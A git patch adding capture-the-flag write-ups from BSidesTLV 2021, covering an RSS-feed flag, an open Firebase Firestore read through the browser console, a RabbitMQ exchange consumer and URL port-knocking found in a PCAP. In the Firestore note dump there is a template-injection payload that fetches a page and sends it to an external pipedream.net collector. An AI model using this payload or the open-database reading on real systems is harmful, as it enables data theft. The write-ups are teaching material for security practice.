From 6bd81d4bbd48d3b72f60fbe8c550a14c55a16b4e Mon Sep 17 00:00:00 2001 From: Dvd848 Date: Fri, 23 Jul 2021 15:37:26 +0300 Subject: [PATCH] BSidesTLV --- 2021_BSidesTLV/News.md | 163 ++++++++++++ 2021_BSidesTLV/Notes.md | 328 ++++++++++++++++++++++++ 2021_BSidesTLV/README.md | 5 + 2021_BSidesTLV/The_Rabbit_Hole.md | 151 +++++++++++ 2021_BSidesTLV/Wh3reIsTheD0oR.md | 403 ++++++++++++++++++++++++++++++ 2021_BSidesTLV/images/top3.png | Bin 0 -> 57798 bytes 6 files changed, 1050 insertions(+) create mode 100644 2021_BSidesTLV/News.md create mode 100644 2021_BSidesTLV/Notes.md create mode 100644 2021_BSidesTLV/README.md create mode 100644 2021_BSidesTLV/The_Rabbit_Hole.md create mode 100644 2021_BSidesTLV/Wh3reIsTheD0oR.md create mode 100644 2021_BSidesTLV/images/top3.png diff --git a/2021_BSidesTLV/News.md b/2021_BSidesTLV/News.md new file mode 100644 index 0000000..cdf67b7 --- /dev/null +++ b/2021_BSidesTLV/News.md @@ -0,0 +1,163 @@ +# News +* Category: Web +* 150 Points +* Solved by the JCTF Team + +## Description + +> Keep updated with our new blog, maybe you'll find interesting articles :) + +## Solution + +We visit the attached website, only to find a standard news portal with many articles. They have "Politics", "Sports", "Art", "Real Estate" - but where is the flag? + +Nothing is out of the ordinary in the site. No dynamic forms, no `robots.txt`, nothing in the source code. + +Eventually, we go back to the description: "*Keep updated with our new blog*" it says. How can we do that? + +Usually such sites provide an RSS feed under `/rss` or `/feed` (with and without an `.xml` extension). Trying the different possibilities, we finally find: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/News] +└─$ curl -s https://news.ctf.bsidestlv.com/rss.xml + + + <![CDATA[News RSS Feed]]> + + https://news.ctf.bsidestlv.com/rss.xml + RSS for Node + Fri, 23 Jul 2021 06:01:36 GMT + + + 60 + + + <![CDATA[Main site]]> + + https://news.ctf.bsidestlv.com/ + https://news.ctf.bsidestlv.com/ + + + + <![CDATA[About Us]]> + + https://news.ctf.bsidestlv.com/aboutus + https://news.ctf.bsidestlv.com/aboutus + + + + + <![CDATA[Art]]> + + https://news.ctf.bsidestlv.com/art + https://news.ctf.bsidestlv.com/art + + + + + <![CDATA[Author]]> + + https://news.ctf.bsidestlv.com/author + https://news.ctf.bsidestlv.com/author + + + + + <![CDATA[Contact Us]]> + + https://news.ctf.bsidestlv.com/contactus + https://news.ctf.bsidestlv.com/contactus + + + + + <![CDATA[Fashion]]> + + https://news.ctf.bsidestlv.com/fashion + https://news.ctf.bsidestlv.com/fashion + + + + + <![CDATA[News Post]]> + + https://news.ctf.bsidestlv.com/news-post + https://news.ctf.bsidestlv.com/news-post + + + + + <![CDATA[Politics]]> + + https://news.ctf.bsidestlv.com/politics + https://news.ctf.bsidestlv.com/politics + + + + + <![CDATA[Real Estate]]> + + https://news.ctf.bsidestlv.com/real-estate + https://news.ctf.bsidestlv.com/real-estate + + + + + <![CDATA[Sports]]> + + https://news.ctf.bsidestlv.com/sports + https://news.ctf.bsidestlv.com/sports + + + + + <![CDATA[Flag]]> + + https://news.ctf.bsidestlv.com/Im4Fl4gS3cr3t + https://news.ctf.bsidestlv.com/Im4Fl4gS3cr3t + + + + + <![CDATA[Travel]]> + + https://news.ctf.bsidestlv.com/travel + https://news.ctf.bsidestlv.com/travel + + + + + <![CDATA[World]]> + + https://news.ctf.bsidestlv.com/world + https://news.ctf.bsidestlv.com/world + + + + + +``` + +Filtering just for the flag, we get: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/News] +└─$ curl -s https://news.ctf.bsidestlv.com/rss.xml | grep -i flag -A 3 + <![CDATA[Flag]]> + + https://news.ctf.bsidestlv.com/Im4Fl4gS3cr3t + https://news.ctf.bsidestlv.com/Im4Fl4gS3cr3t +-- + + + + <![CDATA[Travel]]> +``` + +We visit this URL and get the flag: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/News] +└─$ curl https://news.ctf.bsidestlv.com/Im4Fl4gS3cr3t +BSidesTLV2021{D0ntSt0r3S3ns1t1v3F1l3s1NR55!} +``` \ No newline at end of file diff --git a/2021_BSidesTLV/Notes.md b/2021_BSidesTLV/Notes.md new file mode 100644 index 0000000..eff1d25 --- /dev/null +++ b/2021_BSidesTLV/Notes.md @@ -0,0 +1,328 @@ +# Notes +* Category: Cloud +* 200 Points +* Solved by the JCTF Team + +## Description + +> I made an application that you can store your notes! +> +> Browse and feel free to use it for your purpose :) + +## Solution + +We visit the attached website and find a react-based note-keeping application. + +It has a text box for providing notes, and a submit button. Adding a note will display it in the list of "Items for Update". + +Let's try to submit a new note and follow the browser Network tab in the Developer Tools to see what happens: + +``` +POST /google.firestore.v1.Firestore/Write/channel?database=projects%2Fnotes-d70f4%2Fdatabases%2F(default)&VER=8&gsessionid=QYHTLdO6w42YgFtBAi54B_fHkTiz0ZSqrg5M5vPdpcI&SID=WscmknaqQYD9YF-oZ1BZUw&RID=93137&AID=1&zx=oyum0qd2x67j&t=1 HTTP/1.1 +Host: firestore.googleapis.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 443 +Origin: https://notes.ctf.bsidestlv.com +Alt-Used: firestore.googleapis.com +Connection: keep-alive +Referer: https://notes.ctf.bsidestlv.com/ +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: cross-site + +count=1 +ofs=1 +req0___data__={"streamToken":"GRBoQgKB9LW1","writes":[{"update":{"name":"projects/notes-d70f4/databases/(default)/documents/notes/HP265B9ykQyyj15TbAy9","fields":{"message":{"stringValue":"Test"},"uid":{"stringValue":"c2c8665c-0baf-7158-cb68-61ad8fe2d39b"}}},"currentDocument":{"exists":false}}]} +``` + +We see that the request is being sent to FireBase. It contains the contents of the note we've added (`"Test"`) and our user-id (`"c2c8665c-0baf-7158-cb68-61ad8fe2d39b"`). It also contains a path to the FireBase DB location (`"projects/notes-d70f4/databases/(default)/documents/notes/HP265B9ykQyyj15TbAy9"`) and a token (`"GRBoQgKB9LW1"`). + +We can find the FireBase API information in one of the Javascript files: + +```javascript +(this["webpackJsonpnotes-app"] = this["webpackJsonpnotes-app"] || []).push([ + [0], { + 20: function(e, t, n) {}, + 21: function(e, t, n) {}, + 25: function(e, t, n) { + "use strict"; + n.r(t); + var c = n(6), + s = n.n(c), + a = n(14), + i = n.n(a), + o = (n(20), n(21), n(15)), + r = n(12), + d = (n(22), n(10)); + n(26); + d.a.initializeApp({ + apiKey: "AIzaSyDv5Gb67XqGg25afcDEh7QhUVNmTYtJjME", + authDomain: "notes-d70f4.firebaseapp.com", + projectId: "notes-d70f4", + storageBucket: "notes-d70f4.appspot.com", + messagingSenderId: "905829683791", + appId: "1:905829683791:web:2a16df7f50b7075632d03a", + measurementId: "G-13RYWT5D31" + }); + var l = d.a, + u = n(2); + + function j() { + var e = function() { + return (65536 * (1 + Math.random()) | 0).toString(16).substring(1) + }; + return e() + e() + "-" + e() + "-" + e() + "-" + e() + "-" + e() + e() + e() + } + var m = function() { + var e = function() { + var e = Object(c.useState)([]), + t = Object(r.a)(e, 2), + n = t[0], + s = t[1]; + return Object(c.useEffect)((function() { + window.localStorage.getItem("uid") || window.localStorage.setItem("uid", j()); + var e = l.firestore().collection("notes").where("uid", "==", window.localStorage.getItem("uid")).where("uid", "==", window.localStorage.getItem("uid")).onSnapshot((function(e) { + var t = e.docs.map((function(e) { + return Object(o.a)({ + id: e.id + }, e.data()) + })); + s(t) + })); + return function() { + return e() + } + }), []), n + }(), + t = Object(c.useState)(""), + n = Object(r.a)(t, 2), + s = n[0], + a = n[1]; + return Object(c.useEffect)((function() { + window.localStorage.getItem("uid") || window.localStorage.setItem("uid", j()) + })), Object(u.jsx)("div", { + className: "container mt-5", + children: Object(u.jsx)("div", { + className: "d-flex justify-content-center row", + children: Object(u.jsxs)("div", { + className: "col-md-6", + children: [Object(u.jsxs)("div", { + className: "p-4 bg-white notes", + children: [Object(u.jsxs)("div", { + className: "d-flex flex-row align-items-center notes-title", + children: [Object(u.jsx)("h4", { + children: "Q2 Goal notes" + }), Object(u.jsx)("span", { + className: "px-2 review-text ml-2 rounded", + children: "review" + })] + }), Object(u.jsxs)("div", { + className: "d-flex flex-row align-items-center align-content-center", + children: [Object(u.jsx)("span", { + className: "rounded info", + children: "04/01/2020" + }), Object(u.jsx)("span", { + className: "dot" + }), Object(u.jsx)("span", { + className: "info", + children: "Outlook notes" + })] + })] + }), Object(u.jsxs)("div", { + className: "bg-white p-1", + children: [Object(u.jsx)("hr", {}), Object(u.jsxs)("div", { + className: "keyupdates p-3", + children: [Object(u.jsx)("h5", { + children: "Items for update" + }), e.map((function(e) { + return Object(u.jsxs)("div", { + className: "d-flex align-items-center keyupdates-text", + id: e.id, + children: [Object(u.jsx)("span", { + className: "dot" + }), Object(u.jsx)("span", { + children: e.message + })] + }) + }))] + }), Object(u.jsx)("form", { + onSubmit: function(e) { + e.preventDefault(), l.firestore().collection("notes").add({ + message: s, + uid: window.localStorage.getItem("uid") + }).then((function() { + a("") + })) + }, + children: Object(u.jsxs)("div", { + className: "keyupdates p-3", + children: [Object(u.jsx)("h5", { + children: "Add new note" + }), Object(u.jsx)("textarea", { + name: "content", + id: "noteContent", + value: s, + onChange: function(e) { + return a(e.currentTarget.value) + } + }), Object(u.jsx)("button", { + type: "submit", + className: "btn btn-primary", + id: "noteSubmit", + children: "Submit a note" + })] + }) + })] + })] + }) + }) + }) + }, + b = function(e) { + e && e instanceof Function && n.e(3).then(n.bind(null, 27)).then((function(t) { + var n = t.getCLS, + c = t.getFID, + s = t.getFCP, + a = t.getLCP, + i = t.getTTFB; + n(e), c(e), s(e), a(e), i(e) + })) + }; + i.a.render(Object(u.jsx)(s.a.StrictMode, { + children: Object(u.jsx)(m, {}) + }), document.getElementById("root")), b() + } + }, + [ + [25, 1, 2] + ] +]); +``` + +There's nothing stopping us from connecting to the database ourselves, and [trying to extract public information](https://firebase.google.com/docs/firestore/quickstart#web-v8_1). We can even do it from within the browser console. We start with some initializations: + +```javascript +// Add the FireBase API: + +var script = document.createElement('script'); +script.type = 'text/javascript'; +script.src = "https://www.gstatic.com/firebasejs/8.7.1/firebase-app.js"; +document.head.appendChild(script); + +var script = document.createElement('script'); +script.type = 'text/javascript'; +script.src = "https://www.gstatic.com/firebasejs/8.7.1/firebase-firestore.js"; +document.head.appendChild(script); + +// Initialize Cloud Firestore through Firebase, based on API details we found earlier: +var c = firebase.initializeApp({ + apiKey: "AIzaSyDv5Gb67XqGg25afcDEh7QhUVNmTYtJjME", + authDomain: "notes-d70f4.firebaseapp.com", + projectId: "notes-d70f4", + storageBucket: "notes-d70f4.appspot.com", + messagingSenderId: "905829683791", + appId: "1:905829683791:web:2a16df7f50b7075632d03a", + measurementId: "G-13RYWT5D31" + }); +``` + +Then try to read all the notes with: + +```javascript +c.firestore().collection("notes").get().then((querySnapshot) => { + querySnapshot.forEach((doc) => { + console.log(doc.id + ' => ' + doc.data().message); + }); +}); +``` + +That returns all the notes that all users entered. We can try to filter the results with: + +```javascript +c.firestore().collection("notes").get().then((querySnapshot) => { + querySnapshot.forEach((doc) => { + msg = doc.data().message; + if (msg.includes("flag")) { + console.log(doc.id + ' => ' + doc.data().message); + } + }); +}); + +``` + +We get back a reduced set, but none are related to the real flag: + +``` +44FpMEvTNPNKeoglPjHJ => {{ flag }} +63b6NGGQ5jUwv7k3L3m9 => get flagz +8HW3Z6WVlkC0I46YJBJW => flag +flag +BZxcAsFOgx0J6gxxozaN => flag +Gpr2edxdm0LG5dQDmxLC => flag +Hq7yh4ztSiR9tjSRxMoW => flag +JdypcM3GdARMjHCUhWIc => https://notes.ctf.bsidestlv.com/flag +M0RoZ5H2eTJWMP9muSCC => flag +NX5gdL8Ik5LYaBrqwmuo => flag +Qnj8Kjs6s1M1q7CFqVFT => flag +TWchL7XSijengBeVoPMo => flag +ZNilD49Azmy6p1F7qQL3 => flag +hKViy0uzya8463pRXw0u => flag +jEBTGcVqFtw1whTIa6ji => flag +lrHpCpc3rRSJ1seL6jA1 => flag +print flag +qys2Hpvk8rIY8EwNXteR => +
+ {{constructor.constructor("fetch('/csp-two-flag').then(res=>{return res.text()}).then(body=>{fetch('//ene9q890m5b39.x.pipedream.net//?'+body)})")()}} +
+rmqyn3gmIB4Zzotz07VD => flag +flag +falg +aflg +fagl +tOs2k1QA8gb8CuSvzkc7 => flag +tkGxSUTglsrD6THWFAvs => flag +yIwRMrBmazL3gxfRBjEw => flag +``` + +Searching for the flag format doesn't help either: + +```javascript +c.firestore().collection("notes").get().then((querySnapshot) => { + querySnapshot.forEach((doc) => { + msg = doc.data().message; + if (msg.includes("BSidesTLV2021")) { + console.log(doc.id + ' => ' + doc.data().message);… +``` + +Output: + +``` +YXqusb3Idw9IiGnYRe95 => BSidesTLV2021{a} +fWnF69WMFib5oKxJbEMs => BSidesTLV2021 +j2wgGvpP8mUAPxQefIOS => BSidesTLV2021 +rHC22zGdjIXE1IzmPTAI => BSidesTLV2021 +wwBdyuxLvKn7OOHKZaOW => BSidesTLV2021 +``` + +Up to now we've been trying to extract information from the `notes` collection. What if the flag is in another collection? After all, we can review all the notes in the `notes` collection, and if nothing there seems useful we must find another place to look at. + +The public JS APIs apparently don't allow listing all collections, but we can try to guess the name and see if we're lucky. For example, `flag`: + +```javascript +c.firestore().collection("flag").get().then((querySnapshot) => { + querySnapshot.forEach((doc) => { + console.log(doc.id + ' => ' + doc.data().message); + }); +}); +``` + +We get a single result: + +``` +2JjBihwBuGKEFjA36pOw => BSidesTLV2021{F1r3B4s31sn0ts0s3cur3d} +``` + diff --git a/2021_BSidesTLV/README.md b/2021_BSidesTLV/README.md new file mode 100644 index 0000000..9e71c7b --- /dev/null +++ b/2021_BSidesTLV/README.md @@ -0,0 +1,5 @@ +Various writeups for the [2021 BSidesTLV CTF](https://ctf.bsidestlv.com) ([CTFTime Link](https://ctftime.org/event/1403)). + +Participated as part of the [JCTF team](https://jctf.team/), which came in first! + +![](images/top3.png) \ No newline at end of file diff --git a/2021_BSidesTLV/The_Rabbit_Hole.md b/2021_BSidesTLV/The_Rabbit_Hole.md new file mode 100644 index 0000000..8475d81 --- /dev/null +++ b/2021_BSidesTLV/The_Rabbit_Hole.md @@ -0,0 +1,151 @@ +# The Rabbit Hole +* Category: Misc +* 250 Points +* Solved by the JCTF Team + +## Description + +> My logs are always leaked, do you think you can read them? +> +> tcp://ctf:ctf@the-rabbit-hole.ctf.bsidestlv.com:5672 + + +## Solution + +Port 5672 is assigned to the `RabbitMQ` protocol: + +> RabbitMQ is an open-source message-broker software. ([Source](https://en.wikipedia.org/wiki/RabbitMQ)) + +Wikipedia has a basic Python example showing how to receive messages from a queue. Based on that, we create the following script: + +```python +import pika + +def callback(ch, method, properties, body): + print(" [x] Received %r" % body) + +connection = pika.BlockingConnection(pika.ConnectionParameters('the-rabbit-hole.ctf.bsidestlv.com', 5672, '/')) +channel = connection.channel() +channel.queue_declare(queue="hello") +print(" [*] Waiting for messages. To exit press Ctrl+C") +channel.basic_consume(queue="hello", on_message_callback=callback) +channel.start_consuming() +``` + +We run and get the following output: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/The_Rabbit_Hole] +└─$ python3 test.py +Traceback (most recent call last): + File "/media/sf_CTFs/bsides/The_Rabbit_Hole/test.py", line 6, in + connection = pika.BlockingConnection(pika.ConnectionParameters('the-rabbit-hole.ctf.bsidestlv.com', 5672, '/')) + File "/home/user/.local/lib/python3.9/site-packages/pika/adapters/blocking_connection.py", line 360, in __init__ + self._impl = self._create_connection(parameters, _impl_class) + File "/home/user/.local/lib/python3.9/site-packages/pika/adapters/blocking_connection.py", line 451, in _create_connection + raise self._reap_last_connection_workflow_error(error) +pika.exceptions.ProbableAuthenticationError: ConnectionClosedByBroker: (403) 'ACCESS_REFUSED - Login was refused using authentication mechanism PLAIN. For details see the broker logfile.' +``` + +So, we add the credentials we've received from the description: + +```python +credentials = pika.PlainCredentials('ctf', 'ctf') +connection = pika.BlockingConnection(pika.ConnectionParameters('the-rabbit-hole.ctf.bsidestlv.com', 5672, '/', credentials)) +``` + +It works, but nothing arrives: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/The_Rabbit_Hole] +└─$ python3 test.py + [*] Waiting for messages. To exit press Ctrl+C +^C +``` + +We can try to connect to an exchange by adding: + +```python +result = channel.queue_declare(queue='') +queue_name = result.method.queue +print(f" [-] Queue Name: {queue_name}") + +channel.queue_bind(exchange='', queue=queue_name) +``` + +But we fail since we can't connect to the default exchange: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/The_Rabbit_Hole] +└─$ python3 solve.py + [-] Queue Name: amq.gen-9z0AlTByGDHenZBtq-tMuQ +Traceback (most recent call last): + File "/media/sf_CTFs/bsides/The_Rabbit_Hole/solve.py", line 15, in + channel.queue_bind(exchange='', queue=queue_name) + File "/home/user/.local/lib/python3.9/site-packages/pika/adapters/blocking_connection.py", line 2570, in queue_bind + self._flush_output(bind_ok_result.is_ready) + File "/home/user/.local/lib/python3.9/site-packages/pika/adapters/blocking_connection.py", line 1339, in _flush_output + raise self._closing_reason # pylint: disable=E0702 +pika.exceptions.ChannelClosedByBroker: (403, 'ACCESS_REFUSED - operation not permitted on the default exchange') +``` + +What if we try a different exchange, such as 'test'? + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/The_Rabbit_Hole] +└─$ python3 solve.py + [-] Queue Name: amq.gen-uj30aPm97CkwSsOoK8W_1Q +Traceback (most recent call last): + File "/media/sf_CTFs/bsides/The_Rabbit_Hole/solve.py", line 15, in + channel.queue_bind(exchange='test', queue=queue_name) + File "/home/user/.local/lib/python3.9/site-packages/pika/adapters/blocking_connection.py", line 2570, in queue_bind + self._flush_output(bind_ok_result.is_ready) + File "/home/user/.local/lib/python3.9/site-packages/pika/adapters/blocking_connection.py", line 1339, in _flush_output + raise self._closing_reason # pylint: disable=E0702 +pika.exceptions.ChannelClosedByBroker: (404, "NOT_FOUND - no exchange 'test' in vhost '/'") +``` + +It can't be found. According to the docs, there is no way for a client to enumerate the list of existing exchanges. However, we have a hint in the description: + +> My logs are always leaked, do you think you can read them? + +Let's try "logs", after all, it's right there in the [official tutorial](https://www.rabbitmq.com/tutorials/tutorial-three-python.html): + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/The_Rabbit_Hole] +└─$ python3 solve.py + [-] Queue Name: amq.gen-dLgzc-twerpLr16sAgJbhA + [*] Waiting for logs. To exit press CTRL+C + [x] Received: b'BSidesTLV2021{Sl1d_D0wn_4_r4bb1t_H0l3}' + [x] Received: b'BSidesTLV2021{Sl1d_D0wn_4_r4bb1t_H0l3}' + [x] Received: b'BSidesTLV2021{Sl1d_D0wn_4_r4bb1t_H0l3}' +^C +``` + +The final script: + +```python +#!/usr/bin/env python +import pika + +def callback(ch, method, properties, body): + print(f" [x] Received: {body}") + +credentials = pika.PlainCredentials('ctf', 'ctf') +connection = pika.BlockingConnection(pika.ConnectionParameters('the-rabbit-hole.ctf.bsidestlv.com', 5672, '/', credentials)) +channel = connection.channel() + +result = channel.queue_declare(queue='') +queue_name = result.method.queue +print(f" [-] Queue Name: {queue_name}") + +channel.queue_bind(exchange='logs', queue=queue_name) + +print(' [*] Waiting for logs. To exit press CTRL+C') + +channel.basic_consume(queue = queue_name, on_message_callback = callback, auto_ack = True) + +channel.start_consuming() +``` + + diff --git a/2021_BSidesTLV/Wh3reIsTheD0oR.md b/2021_BSidesTLV/Wh3reIsTheD0oR.md new file mode 100644 index 0000000..2c14bcf --- /dev/null +++ b/2021_BSidesTLV/Wh3reIsTheD0oR.md @@ -0,0 +1,403 @@ +# Wh3reIsTheD0oR +* Category: Forensics +* 150 Points +* Solved by the JCTF Team + +## Description + +> I know the F1Ag is there, but i can't find the s3cr3t door +> +> Maybe the PCAP file has a clue on the way to open it... + +A PCAP file was attached + +## Solution + +Let's check what's happening in the attached PCAP file: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/Wh3reIsTheD0oR] +└─$ tshark -qz io,phs -r w3reisthed0or.pcap + +=================================================================== +Protocol Hierarchy Statistics +Filter: + +eth frames:24918 bytes:22757132 + ip frames:24912 bytes:22756826 + udp frames:4428 bytes:2981384 + dns frames:632 bytes:72397 + quic frames:3796 bytes:2908987 + quic frames:244 bytes:232438 + quic frames:45 bytes:45685 + tcp frames:20475 bytes:19774812 + http frames:140 bytes:77820 + data-text-lines frames:12 bytes:5256 + tcp.segments frames:1 bytes:60 + json frames:5 bytes:2972 + tcp.segments frames:1 bytes:60 + ocsp frames:84 bytes:53650 + tcp.segments frames:3 bytes:1786 + tls frames:5017 bytes:5011356 + tcp.segments frames:2570 bytes:3606663 + tls frames:2268 bytes:3307584 + data frames:287 bytes:15785 + _ws.malformed frames:6 bytes:330 + icmp frames:9 bytes:630 + arp frames:6 bytes:306 +=================================================================== +``` + +We have some HTTP requests, a few are `data-text-lines` and `json` requests and most are `ocsp` requests. Following the different TCP streams, we find the following one: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/Wh3reIsTheD0oR] +└─$ tshark -r ./w3reisthed0or.pcap -qz follow,tcp,ascii,3 + +=================================================================== +Follow: tcp,ascii +Filter: tcp.stream eq 3 +Node 0: 10.0.3.15:49482 +Node 1: 3.126.235.224:80 +352 +GET / HTTP/1.1 +Host: w3reisthed0or.ctf.bsidestlv.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 + + + 334 +HTTP/1.1 200 OK +x-powered-by: Express +set-cookie: session=s%3AZLuxsykXO-Hx4tjM9q2LtwI-j65KTw1H.neqfAVBoRfP%2FSlg88nZEAgo00yD7XzkfGAidnKY%2BYeE; Path=/; HttpOnly +date: Sat, 17 Jul 2021 08:28:44 GMT +transfer-encoding: chunked +set-cookie: BSidesTLV=1b5ae5e6721d6933ee6119e18286258a390cc724; path=/; domain=ctf.bsidestlv.com + +0 + + +509 +GET /CaN HTTP/1.1 +Host: w3reisthed0or.ctf.bsidestlv.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Cookie: session=s%3AZLuxsykXO-Hx4tjM9q2LtwI-j65KTw1H.neqfAVBoRfP%2FSlg88nZEAgo00yD7XzkfGAidnKY%2BYeE; BSidesTLV=1b5ae5e6721d6933ee6119e18286258a390cc724 +Upgrade-Insecure-Requests: 1 + + + 112 +HTTP/1.1 200 OK +x-powered-by: Express +date: Sat, 17 Jul 2021 08:28:45 GMT +transfer-encoding: chunked + +0 + + +508 +GET /D0 HTTP/1.1 +Host: w3reisthed0or.ctf.bsidestlv.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Cookie: session=s%3AZLuxsykXO-Hx4tjM9q2LtwI-j65KTw1H.neqfAVBoRfP%2FSlg88nZEAgo00yD7XzkfGAidnKY%2BYeE; BSidesTLV=1b5ae5e6721d6933ee6119e18286258a390cc724 +Upgrade-Insecure-Requests: 1 + + + 112 +HTTP/1.1 200 OK +x-powered-by: Express +date: Sat, 17 Jul 2021 08:28:47 GMT +transfer-encoding: chunked + +0 + + +511 +GET /dAnC3 HTTP/1.1 +Host: w3reisthed0or.ctf.bsidestlv.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Cookie: session=s%3AZLuxsykXO-Hx4tjM9q2LtwI-j65KTw1H.neqfAVBoRfP%2FSlg88nZEAgo00yD7XzkfGAidnKY%2BYeE; BSidesTLV=1b5ae5e6721d6933ee6119e18286258a390cc724 +Upgrade-Insecure-Requests: 1 + + + 112 +HTTP/1.1 200 OK +x-powered-by: Express +date: Sat, 17 Jul 2021 08:28:48 GMT +transfer-encoding: chunked + +0 + + +508 +GET /M3 HTTP/1.1 +Host: w3reisthed0or.ctf.bsidestlv.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Cookie: session=s%3AZLuxsykXO-Hx4tjM9q2LtwI-j65KTw1H.neqfAVBoRfP%2FSlg88nZEAgo00yD7XzkfGAidnKY%2BYeE; BSidesTLV=1b5ae5e6721d6933ee6119e18286258a390cc724 +Upgrade-Insecure-Requests: 1 + + + 121 +HTTP/1.1 200 OK +x-powered-by: Express +date: Sat, 17 Jul 2021 08:28:48 GMT +transfer-encoding: chunked + +4 +open +0 + + +506 +GET / HTTP/1.1 +Host: w3reisthed0or.ctf.bsidestlv.com +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Cookie: session=s%3AZLuxsykXO-Hx4tjM9q2LtwI-j65KTw1H.neqfAVBoRfP%2FSlg88nZEAgo00yD7XzkfGAidnKY%2BYeE; BSidesTLV=1b5ae5e6721d6933ee6119e18286258a390cc724 +Upgrade-Insecure-Requests: 1 + + + 1460 +HTTP/1.1 200 OK +x-powered-by: Express +content-type: text/html; charset=utf-8 +content-length: 1639 +etag: W/"667-OwsjGJyMzUT+qfTWfwDpICCpCF0" +date: Sat, 17 Jul 2021 08:28:50 GMT + + + + + + + + + + BSidesTLV 2021 - Home + + + + + + + + + + +
+
+

Get the Flag!

+

Can you help me find the L0st F1ag ?

+
+
+ + + + 1 + + +=================================================================== +``` + +Let's concentrate on the `GET` request URI: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/Wh3reIsTheD0oR] +└─$ tshark -r ./w3reisthed0or.pcap -qz follow,tcp,ascii,3 | grep GET +GET / HTTP/1.1 +GET /CaN HTTP/1.1 +GET /D0 HTTP/1.1 +GET /dAnC3 HTTP/1.1 +GET /M3 HTTP/1.1 +GET / HTTP/1.1 +``` + +This looks interesting, but doesn't make sense as a sentence. If we move to stream #4, we also find a similar set of requests: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/Wh3reIsTheD0oR] +└─$ tshark -r ./w3reisthed0or.pcap -qz follow,tcp,ascii,4 | grep GET +GET /favicon.ico HTTP/1.1 +GET /yoU HTTP/1.1 +GET /tA9 HTTP/1.1 +GET /4 HTTP/1.1 +``` + +We'll combine both streams to see what happened: + +```console +┌──(user@kali)-[/media/sf_CTFs/bsides/Wh3reIsTheD0oR] +└─$ tshark -r ./w3reisthed0or.pcap -Y "ip.src == 10.0.3.15 && ip.dst == 3.126.235.224" | grep GET + 46 0.380551 10.0.3.15 → 3.126.235.224 HTTP 406 GET / HTTP/1.1 + 195 0.817496 10.0.3.15 → 3.126.235.224 HTTP 531 GET /favicon.ico HTTP/1.1 + 297 1.761041 10.0.3.15 → 3.126.235.224 HTTP 563 GET /CaN HTTP/1.1 + 1944 2.578609 10.0.3.15 → 3.126.235.224 HTTP 563 GET /yoU HTTP/1.1 + 3749 3.286006 10.0.3.15 → 3.126.235.224 HTTP 562 GET /D0 HTTP/1.1 + 4400 3.751447 10.0.3.15 → 3.126.235.224 HTTP 563 GET /tA9 HTTP/1.1 + 4583 4.273925 10.0.3.15 → 3.126.235.224 HTTP 565 GET /dAnC3 HTTP/1.1 + 4593 4.339010 10.0.3.15 → 3.126.235.224 HTTP 561 GET /4 HTTP/1.1 + 5323 4.880017 10.0.3.15 → 3.126.235.224 HTTP 562 GET /M3 HTTP/1.1 + 6751 6.091966 10.0.3.15 → 3.126.235.224 HTTP 560 GET / HTTP/1.1 +``` + +Now it makes more sense: "CaN yoU D0 tA9 dAnC3 4 M3". Looks like a variation of standard port knocking: We should visit all of these URLs to unlock the flag. + +Notice how the last HTTP request from the dump received the following response: + +```html +
  • + Flag +
